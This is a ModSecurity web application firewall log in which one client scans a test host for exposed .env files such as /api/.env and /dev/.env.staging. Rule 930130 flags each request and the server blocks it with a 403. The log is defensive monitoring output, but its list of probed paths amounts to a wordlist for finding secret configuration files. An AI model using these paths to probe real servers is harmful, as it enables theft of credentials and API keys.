[Thu Jan 08 21:18:04.026908 2026] [:error] [pid 1270037] [client 18.119.100.98:57824] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /website/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env.production"] [unique_id "aWAQ_OA_IfWyU2EIiRhOigAAAAI"]
[Thu Jan 08 21:18:04.027116 2026] [:error] [pid 1270037] [client 18.119.100.98:57824] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env.production"] [unique_id "aWAQ_OA_IfWyU2EIiRhOigAAAAI"]
[Thu Jan 08 21:18:04.027296 2026] [:error] [pid 1270037] [client 18.119.100.98:57824] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env.production"] [unique_id "aWAQ_OA_IfWyU2EIiRhOigAAAAI"]
[Thu Jan 08 21:18:04.373714 2026] [:error] [pid 1280390] [client 18.119.100.98:57940] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /develop/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/develop/.env.production"] [unique_id "aWAQ_NKTJIy7S9W5nL2LRQAAAAk"]
[Thu Jan 08 21:18:04.373930 2026] [:error] [pid 1280390] [client 18.119.100.98:57940] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/develop/.env.production"] [unique_id "aWAQ_NKTJIy7S9W5nL2LRQAAAAk"]
[Thu Jan 08 21:18:04.374097 2026] [:error] [pid 1280390] [client 18.119.100.98:57940] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/develop/.env.production"] [unique_id "aWAQ_NKTJIy7S9W5nL2LRQAAAAk"]
[Thu Jan 08 21:18:04.722637 2026] [:error] [pid 1270038] [client 18.119.100.98:58072] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/API/.env"] [unique_id "aWAQ_BmwMJtANIcuNUXpKgAAAAM"]
[Thu Jan 08 21:18:04.722849 2026] [:error] [pid 1270038] [client 18.119.100.98:58072] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/API/.env"] [unique_id "aWAQ_BmwMJtANIcuNUXpKgAAAAM"]
[Thu Jan 08 21:18:04.723012 2026] [:error] [pid 1270038] [client 18.119.100.98:58072] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/API/.env"] [unique_id "aWAQ_BmwMJtANIcuNUXpKgAAAAM"]
[Thu Jan 08 21:18:05.071648 2026] [:error] [pid 1270039] [client 18.119.100.98:58212] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.production"] [unique_id "aWAQ_ZccQYhM1DUhi_W7DwAAAAQ"]
[Thu Jan 08 21:18:05.071865 2026] [:error] [pid 1270039] [client 18.119.100.98:58212] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.production"] [unique_id "aWAQ_ZccQYhM1DUhi_W7DwAAAAQ"]
[Thu Jan 08 21:18:05.072030 2026] [:error] [pid 1270039] [client 18.119.100.98:58212] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.production"] [unique_id "aWAQ_ZccQYhM1DUhi_W7DwAAAAQ"]
[Thu Jan 08 21:18:05.418662 2026] [:error] [pid 1270043] [client 18.119.100.98:58364] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public_html/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public_html/.env.production"] [unique_id "aWAQ_QvEr1EpOYnVfM6rygAAAAc"]
[Thu Jan 08 21:18:05.418873 2026] [:error] [pid 1270043] [client 18.119.100.98:58364] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public_html/.env.production"] [unique_id "aWAQ_QvEr1EpOYnVfM6rygAAAAc"]
[Thu Jan 08 21:18:05.419036 2026] [:error] [pid 1270043] [client 18.119.100.98:58364] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public_html/.env.production"] [unique_id "aWAQ_QvEr1EpOYnVfM6rygAAAAc"]
[Thu Jan 08 21:18:05.763014 2026] [:error] [pid 1270035] [client 18.119.100.98:58530] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /develop/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/develop/.env.local"] [unique_id "aWAQ_SYqm_i2BUcmtQb4vwAAAAA"]
[Thu Jan 08 21:18:05.763223 2026] [:error] [pid 1270035] [client 18.119.100.98:58530] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/develop/.env.local"] [unique_id "aWAQ_SYqm_i2BUcmtQb4vwAAAAA"]
[Thu Jan 08 21:18:05.763403 2026] [:error] [pid 1270035] [client 18.119.100.98:58530] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/develop/.env.local"] [unique_id "aWAQ_SYqm_i2BUcmtQb4vwAAAAA"]
[Thu Jan 08 21:18:06.104807 2026] [:error] [pid 1270041] [client 18.119.100.98:58682] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /services/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/services/.env.production"] [unique_id "aWAQ_s3GwEx_BV8-CrWUSwAAAAU"]
[Thu Jan 08 21:18:06.105021 2026] [:error] [pid 1270041] [client 18.119.100.98:58682] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/services/.env.production"] [unique_id "aWAQ_s3GwEx_BV8-CrWUSwAAAAU"]
[Thu Jan 08 21:18:06.105180 2026] [:error] [pid 1270041] [client 18.119.100.98:58682] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/services/.env.production"] [unique_id "aWAQ_s3GwEx_BV8-CrWUSwAAAAU"]
[Thu Jan 08 21:18:06.446653 2026] [:error] [pid 1270042] [client 18.119.100.98:58824] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /services/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/services/.env.local"] [unique_id "aWAQ_i7RlX2cRjHcFz6xxwAAAAY"]
[Thu Jan 08 21:18:06.446866 2026] [:error] [pid 1270042] [client 18.119.100.98:58824] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/services/.env.local"] [unique_id "aWAQ_i7RlX2cRjHcFz6xxwAAAAY"]
[Thu Jan 08 21:18:06.447015 2026] [:error] [pid 1270042] [client 18.119.100.98:58824] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/services/.env.local"] [unique_id "aWAQ_i7RlX2cRjHcFz6xxwAAAAY"]
[Thu Jan 08 21:18:06.792278 2026] [:error] [pid 1283304] [client 18.119.100.98:58986] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /back/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/back/.env"] [unique_id "aWAQ_mAwUIZgFNkik8yVQgAAAAg"]
[Thu Jan 08 21:18:06.792493 2026] [:error] [pid 1283304] [client 18.119.100.98:58986] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/back/.env"] [unique_id "aWAQ_mAwUIZgFNkik8yVQgAAAAg"]
[Thu Jan 08 21:18:06.792661 2026] [:error] [pid 1283304] [client 18.119.100.98:58986] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/back/.env"] [unique_id "aWAQ_mAwUIZgFNkik8yVQgAAAAg"]
[Thu Jan 08 21:18:07.138653 2026] [:error] [pid 1270036] [client 18.119.100.98:59136] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /qa/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/qa/.env"] [unique_id "aWAQ_-M1154Q6b0hewij6wAAAAE"]
[Thu Jan 08 21:18:07.138885 2026] [:error] [pid 1270036] [client 18.119.100.98:59136] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/qa/.env"] [unique_id "aWAQ_-M1154Q6b0hewij6wAAAAE"]
[Thu Jan 08 21:18:07.139049 2026] [:error] [pid 1270036] [client 18.119.100.98:59136] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/qa/.env"] [unique_id "aWAQ_-M1154Q6b0hewij6wAAAAE"]
[Thu Jan 08 21:18:07.491017 2026] [:error] [pid 1270037] [client 18.119.100.98:59304] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env.staging"] [unique_id "aWAQ_-A_IfWyU2EIiRhOiwAAAAI"]
[Thu Jan 08 21:18:07.491222 2026] [:error] [pid 1270037] [client 18.119.100.98:59304] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env.staging"] [unique_id "aWAQ_-A_IfWyU2EIiRhOiwAAAAI"]
[Thu Jan 08 21:18:07.491377 2026] [:error] [pid 1270037] [client 18.119.100.98:59304] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env.staging"] [unique_id "aWAQ_-A_IfWyU2EIiRhOiwAAAAI"]
[Thu Jan 08 21:18:07.836010 2026] [:error] [pid 1280390] [client 18.119.100.98:59460] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /demo/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/demo/.env.staging"] [unique_id "aWAQ_9KTJIy7S9W5nL2LRgAAAAk"]
[Thu Jan 08 21:18:07.836914 2026] [:error] [pid 1280390] [client 18.119.100.98:59460] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/demo/.env.staging"] [unique_id "aWAQ_9KTJIy7S9W5nL2LRgAAAAk"]
[Thu Jan 08 21:18:07.837096 2026] [:error] [pid 1280390] [client 18.119.100.98:59460] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/demo/.env.staging"] [unique_id "aWAQ_9KTJIy7S9W5nL2LRgAAAAk"]
[Thu Jan 08 21:18:08.181675 2026] [:error] [pid 1270038] [client 18.119.100.98:59612] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /website/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env.local"] [unique_id "aWARABmwMJtANIcuNUXpKwAAAAM"]
[Thu Jan 08 21:18:08.181902 2026] [:error] [pid 1270038] [client 18.119.100.98:59612] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env.local"] [unique_id "aWARABmwMJtANIcuNUXpKwAAAAM"]
[Thu Jan 08 21:18:08.182075 2026] [:error] [pid 1270038] [client 18.119.100.98:59612] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env.local"] [unique_id "aWARABmwMJtANIcuNUXpKwAAAAM"]
[Thu Jan 08 21:18:08.530066 2026] [:error] [pid 1270039] [client 18.119.100.98:59762] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stg/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/stg/.env.production"] [unique_id "aWARAJccQYhM1DUhi_W7EAAAAAQ"]
